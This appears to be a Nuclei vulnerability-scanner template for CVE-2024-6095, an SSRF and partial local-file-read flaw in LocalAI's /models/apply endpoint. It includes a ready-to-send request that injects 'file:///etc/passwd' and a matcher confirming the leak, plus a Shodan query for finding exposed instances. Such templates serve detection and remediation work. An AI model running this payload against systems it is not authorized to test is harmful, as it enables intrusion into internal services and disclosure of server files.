id: CVE-2024-6095

info:
  name: LocalAI - Partial Local File Read
  author: iamnoooob,pdresearch,rootxharsh
  severity: medium
  description: |
    A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s)-// and file-// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17.
  impact: |
    Attackers can exploit SSRF to access internal HTTP services and partially read local files through error messages, potentially exposing sensitive information.
  remediation: |
    Update LocalAI to version 2.17 or later to address the SSRF and LFI vulnerabilities.
  reference:
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/sev-hack/sev-hack
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6095
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cve-id: CVE-2024-6095
    cwe-id: CWE-918
    epss-score: 0.86379
    epss-percentile: 0.99423
    cpe: cpe:2.3:a:mudler:localai:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mudler
    product: localai
    shodan-query: http.favicon.hash:-976853304
  tags: cve,cve2024,localai,mudler,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /models/apply HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"url":"file:///etc/passwd"}

    extractors:
      - type: json
        part: body
        name: uuid
        internal: true
        json:
          - ".uuid"

  - raw:
      - |
        GET /models/jobs/{{uuid}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ': cannot unmarshal !!str `root:x:...`'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a0046304402205b5ad24f614e4493745845611868ff1316a33dc4fda9803f7e4084d753816ed502206efaefd7e83309a06bc9c3208521178a2d0ea3bb1fe8316e8da53ccd79e85d67:922c64590222798bb761d5b6d8e72950